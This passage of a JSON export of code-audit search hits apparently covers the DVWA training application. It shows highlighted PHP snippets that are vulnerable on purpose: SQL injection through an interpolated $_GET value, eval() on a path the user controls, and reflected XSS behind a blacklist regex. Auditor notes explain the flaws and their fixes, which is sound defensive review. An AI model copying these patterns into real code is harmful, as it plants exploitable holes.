class=\"token operator\">=</span> \"<span class=\"token keyword\">SELECT</span> first_name<span class=\"token punctuation\">,</span> last_name FROM users WHERE user_id <span class=\"token operator\">=</span> <span class=\"token string\">'$id'</span><span class=\"token comment\" spellcheck=\"true\">;\";</span>",
  "line": 3,
  "start": 1,
  "end": 9,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 223,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/sqli_blind/source/low.php",
  "filetype": "php",
  "search": "\\s\\$_GET",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Submit'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check database\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$getid</span>  <span class=\"token operator\">=</span> \"<span class=\"token keyword\">SELECT</span> first_name<span class=\"token punctuation\">,</span> last_name FROM users WHERE user_id <span class=\"token operator\">=</span> <span class=\"token string\">'$id'</span><span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token 
variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span>  <span class=\"token variable\">$getid</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">; // Removed 'or die' to suppress mysql errors</span>\n<span class=\"line-number\">10:</span> ",
  "line": 5,
  "start": 1,
  "end": 11,
  "severity": "unknown",
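  "note": "'id' from the query string (line 5) is interpolated into the SQL text on line 8 and run by mysqli_query() on line 9 with no validation, escaping or parameter binding: SQL injection. The comment on line 9 shows database errors are suppressed, which hides the symptom without removing the flaw. Fix with a prepared statement and a bound parameter."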
 },
 {
  "id": 275,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/view_help.php",
  "filetype": "php",
  "search": "\\s\\$_GET",
  "match": "<span class=\"line-number\">6:</span> <span class=\"token function\">dvwaPageStartup</span><span class=\"token punctuation\">(</span> <span class=\"token function\">array</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'authenticated'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'phpids'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> <span class=\"token variable\">$page</span> <span class=\"token operator\">=</span> <span class=\"token function\">dvwaPageNewGrab</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">'Help'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title_separator'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">.</span><span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \n<span class=\"highlight\"><span class=\"line-number\">11:</span> <span class=\"token variable\">$id</span>       <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span 
class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">12:</span> <span class=\"token variable\">$security</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'security'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \n<span class=\"line-number\">14:</span> <span class=\"token function\">ob_start</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> <span class=\"token function\">eval</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'?>'</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">file_get_contents</span><span class=\"token punctuation\">(</span> DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">\"vulnerabilities/{$id}/help/help.php\"</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'&lt;?php '</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> <span class=\"token variable\">$help</span> <span class=\"token operator\">=</span> <span class=\"token function\">ob_get_contents</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 11,
  "start": 6,
  "end": 17,
  "severity": "unknown",
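  "note": "'id' from the query string (line 11) is placed unvalidated into the path given to file_get_contents() on line 15, and the file's contents are then passed to eval(). A caller-controlled path segment feeding eval() is a code-execution risk; restrict 'id' to a fixed allowlist of module names before building the path."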
 },
 {
  "id": 276,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/view_help.php",
  "filetype": "php",
  "search": "\\s\\$_GET",
  "match": "<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> <span class=\"token variable\">$page</span> <span class=\"token operator\">=</span> <span class=\"token function\">dvwaPageNewGrab</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">'Help'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title_separator'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">.</span><span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> <span class=\"token variable\">$id</span>       <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">12:</span> <span class=\"token variable\">$security</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'security'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">13:</span> 
\n<span class=\"line-number\">14:</span> <span class=\"token function\">ob_start</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> <span class=\"token function\">eval</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'?>'</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">file_get_contents</span><span class=\"token punctuation\">(</span> DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">\"vulnerabilities/{$id}/help/help.php\"</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'&lt;?php '</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> <span class=\"token variable\">$help</span> <span class=\"token operator\">=</span> <span class=\"token function\">ob_get_contents</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">17:</span> <span class=\"token function\">ob_end_clean</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 12,
  "start": 7,
  "end": 18,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 279,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/view_source.php",
  "filetype": "php",
  "search": "\\s\\$_GET",
  "match": "<span class=\"line-number\">6:</span> <span class=\"token function\">dvwaPageStartup</span><span class=\"token punctuation\">(</span> <span class=\"token function\">array</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'authenticated'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'phpids'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> <span class=\"token variable\">$page</span> <span class=\"token operator\">=</span> <span class=\"token function\">dvwaPageNewGrab</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">'Source'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title_separator'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">.</span><span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \n<span class=\"highlight\"><span class=\"line-number\">11:</span> <span class=\"token variable\">$id</span>       <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span 
class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">12:</span> <span class=\"token variable\">$security</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'security'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \n<span class=\"line-number\">14:</span> \n<span class=\"line-number\">15:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$id</span> <span class=\"token operator\">==</span> <span class=\"token string\">'fi'</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">16:</span> \t<span class=\"token variable\">$vuln</span> <span class=\"token operator\">=</span> <span class=\"token string\">'File Inclusion'</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 11,
  "start": 6,
  "end": 17,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 280,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/view_source.php",
  "filetype": "php",
  "search": "\\s\\$_GET",
  "match": "<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> <span class=\"token variable\">$page</span> <span class=\"token operator\">=</span> <span class=\"token function\">dvwaPageNewGrab</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">'Source'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title_separator'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">.</span><span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> <span class=\"token variable\">$id</span>       <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">12:</span> <span class=\"token variable\">$security</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'security'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" 
spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">13:</span> \n<span class=\"line-number\">14:</span> \n<span class=\"line-number\">15:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$id</span> <span class=\"token operator\">==</span> <span class=\"token string\">'fi'</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">16:</span> \t<span class=\"token variable\">$vuln</span> <span class=\"token operator\">=</span> <span class=\"token string\">'File Inclusion'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">17:</span> }",
  "line": 12,
  "start": 7,
  "end": 18,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 278,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/view_source_all.php",
  "filetype": "php",
  "search": "\\s\\$_GET",
  "match": "<span class=\"line-number\">6:</span> <span class=\"token function\">dvwaPageStartup</span><span class=\"token punctuation\">(</span> <span class=\"token function\">array</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'authenticated'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'phpids'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> <span class=\"token variable\">$page</span> <span class=\"token operator\">=</span> <span class=\"token function\">dvwaPageNewGrab</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">'Source'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title_separator'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">.</span><span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \n<span class=\"highlight\"><span class=\"line-number\">11:</span> <span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span 
class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">12:</span> \n<span class=\"line-number\">13:</span> <span class=\"token variable\">$lowsrc</span> <span class=\"token operator\">=</span> @<span class=\"token function\">file_get_contents</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"./{$id}/source/low.php\"</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">14:</span> <span class=\"token variable\">$lowsrc</span> <span class=\"token operator\">=</span> <span class=\"token function\">str_replace</span><span class=\"token punctuation\">(</span> <span class=\"token function\">array</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'$html .='</span> <span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token function\">array</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'echo'</span> <span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$lowsrc</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> <span class=\"token variable\">$lowsrc</span> <span class=\"token operator\">=</span> <span class=\"token function\">highlight_string</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$lowsrc</span><span class=\"token punctuation\">,</span> <span class=\"token boolean\">true</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> ",
  "line": 11,
  "start": 6,
  "end": 17,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 283,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/xss_r/source/high.php",
  "filetype": "php",
  "search": "\\s\\$_GET",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Is there any input<span class=\"token operator\">?</span>\n<span class=\"highlight\"><span class=\"line-number\">4:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">array_key_exists</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"name\"</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_GET</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> !<span class=\"token operator\">=</span> <span class=\"token keyword\">NULL</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">5:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$name</span> <span class=\"token operator\">=</span> <span class=\"token function\">preg_replace</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'/&lt;(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">''</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span 
class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> end user\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"&lt;pre>Hello ${name}&lt;/pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 4,
  "start": 1,
  "end": 10,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 284,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/xss_r/source/high.php",
  "filetype": "php",
  "search": "\\s\\$_GET",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Is there any input<span class=\"token operator\">?</span>\n<span class=\"line-number\">4:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">array_key_exists</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"name\"</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_GET</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> !<span class=\"token operator\">=</span> <span class=\"token keyword\">NULL</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">5:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">6:</span> \t<span class=\"token variable\">$name</span> <span class=\"token operator\">=</span> <span class=\"token function\">preg_replace</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'/&lt;(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">''</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span 
class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> end user\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"&lt;pre>Hello ${name}&lt;/pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> }\n<span class=\"line-number\">11:</span> ",
  "line": 6,
  "start": 1,
  "end": 12,
  "severity": "unknown",
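  "note": "Blacklist filter: preg_replace strips only input that matches the letters of 'script' after an opening angle bracket, and line 9 then interpolates $name into the pre element without HTML encoding. A pattern blacklist is not output encoding: any markup the pattern does not match is still written to the page. The fix shown in impossible.php (htmlspecialchars on the value) applies here too."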
 },
 {
  "id": 285,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/xss_r/source/impossible.php",
  "filetype": "php",
  "search": "\\s\\$_GET",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Is there any input<span class=\"token operator\">?</span>\n<span class=\"highlight\"><span class=\"line-number\">4:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">array_key_exists</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"name\"</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_GET</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> !<span class=\"token operator\">=</span> <span class=\"token keyword\">NULL</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">5:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"line-number\">6:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token 
punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$name</span> <span class=\"token operator\">=</span> <span class=\"token function\">htmlspecialchars</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
  "line": 4,
  "start": 1,
  "end": 10,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 286,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/xss_r/source/impossible.php",
  "filetype": "php",
  "search": "\\s\\$_GET",
  "match": "<span class=\"line-number\">4:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">array_key_exists</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"name\"</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_GET</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> !<span class=\"token operator\">=</span> <span class=\"token keyword\">NULL</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">5:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"line-number\">6:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">9:</span> \t<span class=\"token variable\">$name</span> <span 
class=\"token operator\">=</span> <span class=\"token function\">htmlspecialchars</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> end user\n<span class=\"line-number\">12:</span> \t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">\"&lt;pre>Hello ${name}&lt;/pre>\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> }\n<span class=\"line-number\">14:</span> ",
  "line": 9,
  "start": 4,
  "end": 15,
  "severity": "unknown",
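  "note": "Reference fix for this module: $_GET['name'] is passed through htmlspecialchars() before line 12 interpolates it into the pre element, so the value is written as text rather than markup. It is called without explicit flags or charset, so quote handling follows the PHP version's defaults; that does not matter in this element-content position, but on PHP versions before 8.1 it would in a single-quoted attribute."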
 },
 {
  "id": 289,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/xss_r/source/low.php",
  "filetype": "php",
  "search": "\\s\\$_GET",
  "match": "<span class=\"line-number\">1:</span> <span class=\"token operator\">&lt;</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Is there any input<span class=\"token operator\">?</span>\n<span class=\"highlight\"><span class=\"line-number\">4:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">array_key_exists</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"name\"</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_GET</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&amp;</span><span class=\"token operator\">&amp;</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> !<span class=\"token operator\">=</span> <span class=\"token keyword\">NULL</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">5:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Feedback <span class=\"token keyword\">for</span> end user\n<span class=\"line-number\">6:</span> \t<span class=\"token variable\">$html</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">'&lt;pre>Hello '</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'name'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'&lt;/pre>'</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> }\n<span 
class=\"line-number\">8:</span> \n<span class=\"line-number\">9:</span> <span class=\"token operator\">?</span><span class=\"token operator\">></span>",
  "line": 4,
  "start": 1,
  "end": 10,
  "severity": "unknown",
  "note": ""
 },
 {
  "id": 290,
  "file": "/home/chris/src/DVWA-master/vulnerabilities/xss_r/source/low.php",
  "filetype": "php",
  "search": "\\s\\$_GET",
